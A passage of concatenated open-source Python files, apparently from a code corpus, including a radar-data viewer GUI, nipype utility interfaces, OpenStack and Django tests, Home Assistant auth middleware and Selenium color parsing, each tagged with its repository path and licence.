from wradvis.config import conf
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.resize(825, 500)
self.setWindowTitle('RADOLAN Viewer')
self._need_canvas_refresh = False
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.reload)
# initialize RadolanCanvas
self.rwidget = RadolanWidget()
self.iwidget = self.rwidget
# initialize MplWidget
self.mwidget = MplWidget()
# canvas swapper
self.swapper = []
self.swapper.append(self.rwidget)
self.swapper.append(self.mwidget)
# need some tracer for the mouse position
self.rwidget.canvas.mouse_moved.connect(self.mouse_moved)
self.rwidget.canvas.key_pressed.connect(self.keyPressEvent)
# add PropertiesWidget
self.props = PropertiesWidget()
self.props.signal_slider_changed.connect(self.slider_changed)
self.props.signal_playpause_changed.connect(self.start_stop)
self.props.signal_speed_changed.connect(self.speed)
# add Horizontal Splitter and the three widgets
self.splitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
self.splitter.addWidget(self.props)
self.splitter.addWidget(self.swapper[0])
self.splitter.addWidget(self.swapper[1])
self.swapper[1].hide()
self.setCentralWidget(self.splitter)
# finish init
self.slider_changed()
def reload(self):
if self.props.slider.value() == self.props.slider.maximum():
self.props.slider.setValue(1)
else:
self.props.slider.setValue(self.props.slider.value() + 1)
def start_stop(self):
if self.timer.isActive():
self.timer.stop()
else:
self.timer.start()
def speed(self):
self.timer.setInterval(self.props.speed.value())
def slider_changed(self):
try:
self.data, self.meta = utils.read_radolan(self.props.filelist[self.props.actualFrame])
except IndexError:
print("Could not read any data.")
else:
scantime = self.meta['datetime']
self.props.sliderLabel.setText(scantime.strftime("%H:%M"))
self.props.date.setText(scantime.strftime("%Y-%m-%d"))
self.iwidget.set_data(self.data)
def mouse_moved(self, event):
self.props.show_mouse(self.rwidget.canvas._mouse_position)
def keyPressEvent(self, event):
if isinstance(event, QtGui.QKeyEvent):
text = event.text()
else:
text = event.text
if text == 'c':
self.swapper = self.swapper[::-1]
self.iwidget = self.swapper[0]
self.swapper[0].show()
self.swapper[1].hide()
def start(arg):
appQt = QtGui.QApplication(arg.argv)
win = MainWindow()
win.show()
appQt.exec_()
if __name__ == '__main__':
print('wradview: Calling module <gui> as main...')
| mit |
jeltz/rust-debian-package | src/llvm/tools/clang/utils/analyzer/SATestAdd.py | 48 | 3075 | #!/usr/bin/env python
"""
Static Analyzer qualification infrastructure: adding a new project to
the Repository Directory.
Add a new project for testing: build it and add to the Project Map file.
Assumes it's being run from the Repository Directory.
The project directory should be added inside the Repository Directory and
have the same name as the project ID
The project should use the following files for set up:
- pre_run_static_analyzer.sh - prepare the build environment.
Ex: make clean can be a part of it.
- run_static_analyzer.cmd - a list of commands to run through scan-build.
Each command should be on a separate line.
Choose from: configure, make, xcodebuild
"""
import SATestBuild
import os
import csv
import sys
def isExistingProject(PMapFile, projectID) :
PMapReader = csv.reader(PMapFile)
for I in PMapReader:
if projectID == I[0]:
return True
return False
# Add a new project for testing: build it and add to the Project Map file.
# Params:
# Dir is the directory where the sources are.
# ID is a short string used to identify a project.
def addNewProject(ID, BuildMode) :
CurDir = os.path.abspath(os.curdir)
Dir = SATestBuild.getProjectDir(ID)
if not os.path.exists(Dir):
print "Error: Project directory is missing: %s" % Dir
sys.exit(-1)
# Build the project.
SATestBuild.testProject(ID, BuildMode, IsReferenceBuild=True, Dir=Dir)
# Add the project ID to the project map.
ProjectMapPath = os.path.join(CurDir, SATestBuild.ProjectMapFile)
if os.path.exists(ProjectMapPath):
PMapFile = open(ProjectMapPath, "r+b")
else:
print "Warning: Creating the Project Map file!!"
PMapFile = open(ProjectMapPath, "w+b")
try:
if (isExistingProject(PMapFile, ID)) :
print >> sys.stdout, 'Warning: Project with ID \'', ID, \
'\' already exists.'
print >> sys.stdout, "Reference output has been regenerated."
else:
PMapWriter = csv.writer(PMapFile)
PMapWriter.writerow( (ID, int(BuildMode)) );
print "The project map is updated: ", ProjectMapPath
finally:
PMapFile.close()
# TODO: Add an option not to build.
# TODO: Set the path to the Repository directory.
if __name__ == '__main__':
if len(sys.argv) < 2:
print >> sys.stderr, 'Usage: ', sys.argv[0],\
'project_ID <mode>' \
'mode - 0 for single file project; ' \
'1 for scan_build; ' \
'2 for single file c++11 project'
sys.exit(-1)
BuildMode = 1
if (len(sys.argv) >= 3):
BuildMode = int(sys.argv[2])
assert((BuildMode == 0) | (BuildMode == 1) | (BuildMode == 2))
addNewProject(sys.argv[1], BuildMode)
| apache-2.0 |
grlee77/nipype | nipype/interfaces/utility.py | 9 | 20150 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Various utilities
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../testing/data'))
>>> os.chdir(datadir)
"""
import os
import re
from cPickle import dumps, loads
import numpy as np
import nibabel as nb
from nipype.external import six
from nipype.utils.filemanip import (filename_to_list, copyfile, split_filename)
from nipype.interfaces.base import (traits, TraitedSpec, DynamicTraitedSpec, File,
Undefined, isdefined, OutputMultiPath,
InputMultiPath, BaseInterface, BaseInterfaceInputSpec)
from nipype.interfaces.io import IOBase, add_traits
from nipype.testing import assert_equal
from nipype.utils.misc import getsource, create_function_from_source
class IdentityInterface(IOBase):
"""Basic interface class generates identity mappings
Examples
--------
>>> from nipype.interfaces.utility import IdentityInterface
>>> ii = IdentityInterface(fields=['a', 'b'], mandatory_inputs=False)
>>> ii.inputs.a
<undefined>
>>> ii.inputs.a = 'foo'
>>> out = ii._outputs()
>>> out.a
<undefined>
>>> out = ii.run()
>>> out.outputs.a
'foo'
>>> ii2 = IdentityInterface(fields=['a', 'b'], mandatory_inputs=True)
>>> ii2.inputs.a = 'foo'
>>> out = ii2.run() # doctest: +SKIP
ValueError: IdentityInterface requires a value for input 'b' because it was listed in 'fields' Interface IdentityInterface failed to run.
"""
input_spec = DynamicTraitedSpec
output_spec = DynamicTraitedSpec
def __init__(self, fields=None, mandatory_inputs=True, **inputs):
super(IdentityInterface, self).__init__(**inputs)
if fields is None or not fields:
raise ValueError('Identity Interface fields must be a non-empty list')
# Each input must be in the fields.
for in_field in inputs:
if in_field not in fields:
raise ValueError('Identity Interface input is not in the fields: %s' % in_field)
self._fields = fields
self._mandatory_inputs = mandatory_inputs
add_traits(self.inputs, fields)
# Adding any traits wipes out all input values set in superclass initialization,
# even it the trait is not in the add_traits argument. The work-around is to reset
# the values after adding the traits.
self.inputs.set(**inputs)
def _add_output_traits(self, base):
undefined_traits = {}
for key in self._fields:
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _list_outputs(self):
#manual mandatory inputs check
if self._fields and self._mandatory_inputs:
for key in self._fields:
value = getattr(self.inputs, key)
if not isdefined(value):
msg = "%s requires a value for input '%s' because it was listed in 'fields'. \
You can turn off mandatory inputs checking by passing mandatory_inputs = False to the constructor." % \
(self.__class__.__name__, key)
raise ValueError(msg)
outputs = self._outputs().get()
for key in self._fields:
val = getattr(self.inputs, key)
if isdefined(val):
outputs[key] = val
return outputs
class MergeInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec):
axis = traits.Enum('vstack', 'hstack', usedefault=True,
desc='direction in which to merge, hstack requires same number of elements in each input')
no_flatten = traits.Bool(False, usedefault=True, desc='append to outlist instead of extending in vstack mode')
class MergeOutputSpec(TraitedSpec):
out = traits.List(desc='Merged output')
class Merge(IOBase):
"""Basic interface class to merge inputs into a single list
Examples
--------
>>> from nipype.interfaces.utility import Merge
>>> mi = Merge(3)
>>> mi.inputs.in1 = 1
>>> mi.inputs.in2 = [2, 5]
>>> mi.inputs.in3 = 3
>>> out = mi.run()
>>> out.outputs.out
[1, 2, 5, 3]
"""
input_spec = MergeInputSpec
output_spec = MergeOutputSpec
def __init__(self, numinputs=0, **inputs):
super(Merge, self).__init__(**inputs)
self._numinputs = numinputs
add_traits(self.inputs, ['in%d' % (i + 1) for i in range(numinputs)])
def _list_outputs(self):
outputs = self._outputs().get()
out = []
if self.inputs.axis == 'vstack':
for idx in range(self._numinputs):
value = getattr(self.inputs, 'in%d' % (idx + 1))
if isdefined(value):
if isinstance(value, list) and not self.inputs.no_flatten:
out.extend(value)
else:
out.append(value)
else:
for i in range(len(filename_to_list(self.inputs.in1))):
out.insert(i, [])
for j in range(self._numinputs):
out[i].append(filename_to_list(getattr(self.inputs, 'in%d' % (j + 1)))[i])
if out:
outputs['out'] = out
return outputs
class RenameInputSpec(DynamicTraitedSpec):
in_file = File(exists=True, mandatory=True, desc="file to rename")
keep_ext = traits.Bool(desc=("Keep in_file extension, replace "
"non-extension component of name"))
format_string = traits.String(mandatory=True,
desc=("Python formatting string for output "
"template"))
parse_string = traits.String(desc=("Python regexp parse string to define "
"replacement inputs"))
use_fullpath = traits.Bool(False, usedefault=True,
desc="Use full path as input to regex parser")
class RenameOutputSpec(TraitedSpec):
out_file = traits.File(exists=True, desc="softlink to original file with new name")
class Rename(IOBase):
"""Change the name of a file based on a mapped format string.
To use additional inputs that will be defined at run-time, the class
constructor must be called with the format template, and the fields
identified will become inputs to the interface.
Additionally, you may set the parse_string input, which will be run
over the input filename with a regular expressions search, and will
fill in additional input fields from matched groups. Fields set with
inputs have precedence over fields filled in with the regexp match.
Examples
--------
>>> from nipype.interfaces.utility import Rename
>>> rename1 = Rename()
>>> rename1.inputs.in_file = "zstat1.nii.gz"
>>> rename1.inputs.format_string = "Faces-Scenes.nii.gz"
>>> res = rename1.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
'Faces-Scenes.nii.gz" # doctest: +SKIP
>>> rename2 = Rename(format_string="%(subject_id)s_func_run%(run)02d")
>>> rename2.inputs.in_file = "functional.nii"
>>> rename2.inputs.keep_ext = True
>>> rename2.inputs.subject_id = "subj_201"
>>> rename2.inputs.run = 2
>>> res = rename2.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
'subj_201_func_run02.nii' # doctest: +SKIP
>>> rename3 = Rename(format_string="%(subject_id)s_%(seq)s_run%(run)02d.nii")
>>> rename3.inputs.in_file = "func_epi_1_1.nii"
>>> rename3.inputs.parse_string = "func_(?P<seq>\w*)_.*"
>>> rename3.inputs.subject_id = "subj_201"
>>> rename3.inputs.run = 2
>>> res = rename3.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
'subj_201_epi_run02.nii' # doctest: +SKIP
"""
input_spec = RenameInputSpec
output_spec = RenameOutputSpec
def __init__(self, format_string=None, **inputs):
super(Rename, self).__init__(**inputs)
if format_string is not None:
self.inputs.format_string = format_string
self.fmt_fields = re.findall(r"%\((.+?)\)", format_string)
add_traits(self.inputs, self.fmt_fields)
else:
self.fmt_fields = []
def _rename(self):
fmt_dict = dict()
if isdefined(self.inputs.parse_string):
if isdefined(self.inputs.use_fullpath) and self.inputs.use_fullpath:
m = re.search(self.inputs.parse_string,
self.inputs.in_file)
else:
m = re.search(self.inputs.parse_string,
os.path.split(self.inputs.in_file)[1])
if m:
fmt_dict.update(m.groupdict())
for field in self.fmt_fields:
val = getattr(self.inputs, field)
if isdefined(val):
fmt_dict[field] = getattr(self.inputs, field)
if self.inputs.keep_ext:
fmt_string = "".join([self.inputs.format_string,
split_filename(self.inputs.in_file)[2]])
else:
fmt_string = self.inputs.format_string
return fmt_string % fmt_dict
def _run_interface(self, runtime):
runtime.returncode = 0
_ = copyfile(self.inputs.in_file, os.path.join(os.getcwd(),
self._rename()))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.join(os.getcwd(), self._rename())
return outputs
class SplitInputSpec(BaseInterfaceInputSpec):
inlist = traits.List(traits.Any, mandatory=True,
desc='list of values to split')
splits = traits.List(traits.Int, mandatory=True,
desc='Number of outputs in each split - should add to number of inputs')
squeeze = traits.Bool(False, usedefault=True,
desc='unfold one-element splits removing the list')
class Split(IOBase):
"""Basic interface class to split lists into multiple outputs
Examples
--------
>>> from nipype.interfaces.utility import Split
>>> sp = Split()
>>> _ = sp.inputs.set(inlist=[1, 2, 3], splits=[2, 1])
>>> out = sp.run()
>>> out.outputs.out1
[1, 2]
"""
input_spec = SplitInputSpec
output_spec = DynamicTraitedSpec
def _add_output_traits(self, base):
undefined_traits = {}
for i in range(len(self.inputs.splits)):
key = 'out%d' % (i + 1)
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.splits):
if sum(self.inputs.splits) != len(self.inputs.inlist):
raise RuntimeError('sum of splits != num of list elements')
splits = [0]
splits.extend(self.inputs.splits)
splits = np.cumsum(splits)
for i in range(len(splits) - 1):
val = np.array(self.inputs.inlist)[splits[i]:splits[i + 1]].tolist()
if self.inputs.squeeze and len(val) == 1:
val = val[0]
outputs['out%d' % (i + 1)] = val
return outputs
class SelectInputSpec(BaseInterfaceInputSpec):
inlist = InputMultiPath(traits.Any, mandatory=True,
desc='list of values to choose from')
index = InputMultiPath(traits.Int, mandatory=True,
desc='0-based indices of values to choose')
class SelectOutputSpec(TraitedSpec):
out = OutputMultiPath(traits.Any, desc='list of selected values')
class Select(IOBase):
"""Basic interface class to select specific elements from a list
Examples
--------
>>> from nipype.interfaces.utility import Select
>>> sl = Select()
>>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3])
>>> out = sl.run()
>>> out.outputs.out
4
>>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3, 4])
>>> out = sl.run()
>>> out.outputs.out
[4, 5]
"""
input_spec = SelectInputSpec
output_spec = SelectOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
out = np.array(self.inputs.inlist)[np.array(self.inputs.index)].tolist()
outputs['out'] = out
return outputs
class FunctionInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec):
function_str = traits.Str(mandatory=True, desc='code for function')
class Function(IOBase):
"""Runs arbitrary function as an interface
Examples
--------
>>> func = 'def func(arg1, arg2=5): return arg1 + arg2'
>>> fi = Function(input_names=['arg1', 'arg2'], output_names=['out'])
>>> fi.inputs.function_str = func
>>> res = fi.run(arg1=1)
>>> res.outputs.out
6
"""
input_spec = FunctionInputSpec
output_spec = DynamicTraitedSpec
def __init__(self, input_names, output_names, function=None, imports=None,
**inputs):
"""
Parameters
----------
input_names: single str or list
names corresponding to function inputs
output_names: single str or list
names corresponding to function outputs.
has to match the number of outputs
function : callable
callable python object. must be able to execute in an
isolated namespace (possibly in concert with the ``imports``
parameter)
imports : list of strings
list of import statements that allow the function to execute
in an otherwise empty namespace
"""
super(Function, self).__init__(**inputs)
if function:
if hasattr(function, '__call__'):
try:
self.inputs.function_str = getsource(function)
except IOError:
raise Exception('Interface Function does not accept ' \
'function objects defined interactively ' \
'in a python session')
elif isinstance(function, six.string_types):
self.inputs.function_str = dumps(function)
else:
raise Exception('Unknown type of function')
self.inputs.on_trait_change(self._set_function_string,
'function_str')
self._input_names = filename_to_list(input_names)
self._output_names = filename_to_list(output_names)
add_traits(self.inputs, [name for name in self._input_names])
self.imports = imports
self._out = {}
for name in self._output_names:
self._out[name] = None
def _set_function_string(self, obj, name, old, new):
if name == 'function_str':
if hasattr(new, '__call__'):
function_source = getsource(new)
elif isinstance(new, six.string_types):
function_source = dumps(new)
self.inputs.trait_set(trait_change_notify=False,
**{'%s' % name: function_source})
def _add_output_traits(self, base):
undefined_traits = {}
for key in self._output_names:
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _run_interface(self, runtime):
function_handle = create_function_from_source(self.inputs.function_str,
self.imports)
args = {}
for name in self._input_names:
value = getattr(self.inputs, name)
if isdefined(value):
args[name] = value
out = function_handle(**args)
if len(self._output_names) == 1:
self._out[self._output_names[0]] = out
else:
if isinstance(out, tuple) and (len(out) != len(self._output_names)):
raise RuntimeError('Mismatch in number of expected outputs')
else:
for idx, name in enumerate(self._output_names):
self._out[name] = out[idx]
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
for key in self._output_names:
outputs[key] = self._out[key]
return outputs
class AssertEqualInputSpec(BaseInterfaceInputSpec):
volume1 = File(exists=True, mandatory=True)
volume2 = File(exists=True, mandatory=True)
class AssertEqual(BaseInterface):
input_spec = AssertEqualInputSpec
def _run_interface(self, runtime):
data1 = nb.load(self.inputs.volume1).get_data()
data2 = nb.load(self.inputs.volume2).get_data()
assert_equal(data1, data2)
return runtime
class CSVReaderInputSpec(DynamicTraitedSpec, TraitedSpec):
in_file = File(exists=True, mandatory=True, desc='Input comma-seperated value (CSV) file')
header = traits.Bool(False, usedefault=True, desc='True if the first line is a column header')
class CSVReader(BaseInterface):
"""
Examples
--------
>>> reader = CSVReader() # doctest: +SKIP
>>> reader.inputs.in_file = 'noHeader.csv' # doctest: +SKIP
>>> out = reader.run() # doctest: +SKIP
>>> out.outputs.column_0 == ['foo', 'bar', 'baz'] # doctest: +SKIP
True
>>> out.outputs.column_1 == ['hello', 'world', 'goodbye'] # doctest: +SKIP
True
>>> out.outputs.column_2 == ['300.1', '5', '0.3'] # doctest: +SKIP
True
>>> reader = CSVReader() # doctest: +SKIP
>>> reader.inputs.in_file = 'header.csv' # doctest: +SKIP
>>> reader.inputs.header = True # doctest: +SKIP
>>> out = reader.run() # doctest: +SKIP
>>> out.outputs.files == ['foo', 'bar', 'baz'] # doctest: +SKIP
True
>>> out.outputs.labels == ['hello', 'world', 'goodbye'] # doctest: +SKIP
True
>>> out.outputs.erosion == ['300.1', '5', '0.3'] # doctest: +SKIP
True
"""
input_spec = CSVReaderInputSpec
output_spec = DynamicTraitedSpec
_always_run = True
def _append_entry(self, outputs, entry):
for key, value in zip(self._outfields, entry):
outputs[key].append(value)
return outputs
def _parse_line(self, line):
line = line.replace('\n', '')
entry = [x.strip() for x in line.split(',')]
return entry
def _get_outfields(self):
with open(self.inputs.in_file, 'r') as fid:
entry = self._parse_line(fid.readline())
if self.inputs.header:
self._outfields = tuple(entry)
else:
self._outfields = tuple(['column_' + str(x) for x in range(len(entry))])
return self._outfields
def _run_interface(self, runtime):
self._get_outfields()
return runtime
def _outputs(self):
return self._add_output_traits(super(CSVReader, self)._outputs())
def _add_output_traits(self, base):
return add_traits(base, self._get_outfields())
def _list_outputs(self):
outputs = self.output_spec().get()
isHeader = True
for key in self._outfields:
outputs[key] = [] # initialize outfields
with open(self.inputs.in_file, 'r') as fid:
for line in fid.readlines():
if self.inputs.header and isHeader: # skip header line
isHeader = False
continue
entry = self._parse_line(line)
outputs = self._append_entry(outputs, entry)
return outputs
| bsd-3-clause |
psiwczak/openstack | nova/tests/api/openstack/compute/contrib/test_scheduler_hints.py | 6 | 3228 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import compute
from nova.api.openstack.compute import extensions
from nova.api.openstack import wsgi
import nova.db.api
import nova.rpc
from nova import test
from nova.tests.api.openstack import fakes
from nova import utils
UUID = fakes.FAKE_UUID
class SchedulerHintsTestCase(test.TestCase):
def setUp(self):
super(SchedulerHintsTestCase, self).setUp()
self.fake_instance = fakes.stub_instance(1, uuid=UUID)
self.app = compute.APIRouter()
def test_create_server_without_hints(self):
def fake_create(*args, **kwargs):
self.assertEqual(kwargs['scheduler_hints'], {})
return ([self.fake_instance], '')
self.stubs.Set(nova.compute.api.API, 'create', fake_create)
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
}}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(202, res.status_int)
def test_create_server_with_hints(self):
def fake_create(*args, **kwargs):
self.assertEqual(kwargs['scheduler_hints'], {'a': 'b'})
return ([self.fake_instance], '')
self.stubs.Set(nova.compute.api.API, 'create', fake_create)
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {
'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
},
'os:scheduler_hints': {'a': 'b'},
}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(202, res.status_int)
def test_create_server_bad_hints(self):
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {
'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
},
'os:scheduler_hints': 'here',
}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
| apache-2.0 |
rabernat/xrft | setup.py | 1 | 1391 | import os
import versioneer
from setuptools import setup, find_packages
PACKAGES = find_packages()
DISTNAME = 'xrft'
LICENSE = 'MIT'
AUTHOR = 'xrft Developers'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xrft'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray', 'dask', 'numpy', 'pandas', 'scipy']
EXTRAS_REQUIRE = ['cftime']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Discrete Fourier Transform with xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit |
SexualHealthInnovations/callisto-core | callisto_core/tests/notification/test_views.py | 2 | 1698 | from unittest import skip
from unittest.mock import ANY, call, patch
from callisto_core.reporting.views import ReportingConfirmationView
from callisto_core.tests.test_base import ReportFlowHelper as ReportFlowTestCase
from callisto_core.tests.utils.api import CustomNotificationApi
@skip("disabled for 2019 summer maintenance - record creation is no longer supported")
class NotificationViewTest(ReportFlowTestCase):
def test_submit_confirmation_admin_email(self):
with patch.object(CustomNotificationApi, "_logging") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[
call(
notification_name=ReportingConfirmationView.admin_email_template_name
),
call(report=self.report),
],
any_order=True,
)
def test_submit_confirmation_user_email(self):
with patch.object(CustomNotificationApi, "_logging") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[call(notification_name="submit_confirmation")], any_order=True
)
def test_submit_confirmation_slack_notification(self):
with patch.object(CustomNotificationApi, "slack_notification") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[call(msg=ANY, type="submit_confirmation")], any_order=True
)
| agpl-3.0 |
lordB8r/polls | ENV/lib/python2.7/site-packages/django/contrib/sites/tests.py | 94 | 2574 | from __future__ import unicode_literals
from django.conf import settings
from django.contrib.sites.models import Site, RequestSite, get_current_site
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpRequest
from django.test import TestCase
from django.test.utils import override_settings
class SitesFrameworkTests(TestCase):
def setUp(self):
Site(id=settings.SITE_ID, domain="example.com", name="example.com").save()
self.old_Site_meta_installed = Site._meta.installed
Site._meta.installed = True
def tearDown(self):
Site._meta.installed = self.old_Site_meta_installed
def test_save_another(self):
# Regression for #17415
# On some backends the sequence needs reset after save with explicit ID.
# Test that there is no sequence collisions by saving another site.
Site(domain="example2.com", name="example2.com").save()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertTrue(isinstance(s, Site))
s.delete()
self.assertRaises(ObjectDoesNotExist, Site.objects.get_current)
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertTrue(isinstance(site, Site))
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
self.assertRaises(ObjectDoesNotExist, get_current_site, request)
# A RequestSite is returned if the sites framework is not installed
Site._meta.installed = False
site = get_current_site(request)
self.assertTrue(isinstance(site, RequestSite))
self.assertEqual(site.name, "example.com")
| mit |
JshWright/home-assistant | homeassistant/components/http/auth.py | 3 | 1964 | """Authentication for HTTP component."""
import asyncio
import hmac
import logging
from homeassistant.const import HTTP_HEADER_HA_AUTH
from .util import get_real_ip
from .const import KEY_TRUSTED_NETWORKS, KEY_AUTHENTICATED
DATA_API_PASSWORD = 'api_password'
_LOGGER = logging.getLogger(__name__)
@asyncio.coroutine
def auth_middleware(app, handler):
"""Authenticate as middleware."""
# If no password set, just always set authenticated=True
if app['hass'].http.api_password is None:
@asyncio.coroutine
def no_auth_middleware_handler(request):
"""Auth middleware to approve all requests."""
request[KEY_AUTHENTICATED] = True
return handler(request)
return no_auth_middleware_handler
@asyncio.coroutine
def auth_middleware_handler(request):
"""Auth middleware to check authentication."""
# Auth code verbose on purpose
authenticated = False
if (HTTP_HEADER_HA_AUTH in request.headers and
validate_password(
request, request.headers[HTTP_HEADER_HA_AUTH])):
# A valid auth header has been set
authenticated = True
elif (DATA_API_PASSWORD in request.GET and
validate_password(request, request.GET[DATA_API_PASSWORD])):
authenticated = True
elif is_trusted_ip(request):
authenticated = True
request[KEY_AUTHENTICATED] = authenticated
return handler(request)
return auth_middleware_handler
def is_trusted_ip(request):
"""Test if request is from a trusted ip."""
ip_addr = get_real_ip(request)
return ip_addr and any(
ip_addr in trusted_network for trusted_network
in request.app[KEY_TRUSTED_NETWORKS])
def validate_password(request, api_password):
"""Test if password is valid."""
return hmac.compare_digest(
api_password, request.app['hass'].http.api_password)
| apache-2.0 |
xlzdew/seleniumpr | py/selenium/webdriver/support/color.py | 49 | 11161 | #!/usr/bin/python
# Copyright 2011 Software Freedom Conservancy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
RGB_PATTERN = r"^\s*rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)\s*$"
RGB_PCT_PATTERN = r"^\s*rgb\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*\)\s*$"
RGBA_PATTERN = r"^\s*rgba\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
RGBA_PCT_PATTERN = r"^\s*rgba\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
HEX_PATTERN = r"#([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})"
HEX3_PATTERN = r"#([A-Fa-f0-9])([A-Fa-f0-9])([A-Fa-f0-9])"
HSL_PATTERN = r"^\s*hsl\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*\)\s*$"
HSLA_PATTERN = r"^\s*hsla\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
class Color(object):
"""
Color conversion support class
Example:
.. code-block:: python
from selenium.webdriver.support.color import Color
print(Color.from_string('#00ff33').rgba)
print(Color.from_string('rgb(1, 255, 3)').hex)
print(Color.from_string('blue').rgba)
"""
@staticmethod
def from_string(str_):
import re
class Matcher(object):
def __init__(self):
self.match_obj = None
def match(self, pattern, str_):
self.match_obj = re.match(pattern, str_)
return self.match_obj
@property
def groups(self):
return () if self.match_obj is None else self.match_obj.groups()
m = Matcher()
if m.match(RGB_PATTERN, str_):
return Color(*m.groups)
elif m.match(RGB_PCT_PATTERN, str_):
rgb = tuple([float(each) / 100 * 255 for each in m.groups])
return Color(*rgb)
elif m.match(RGBA_PATTERN, str_):
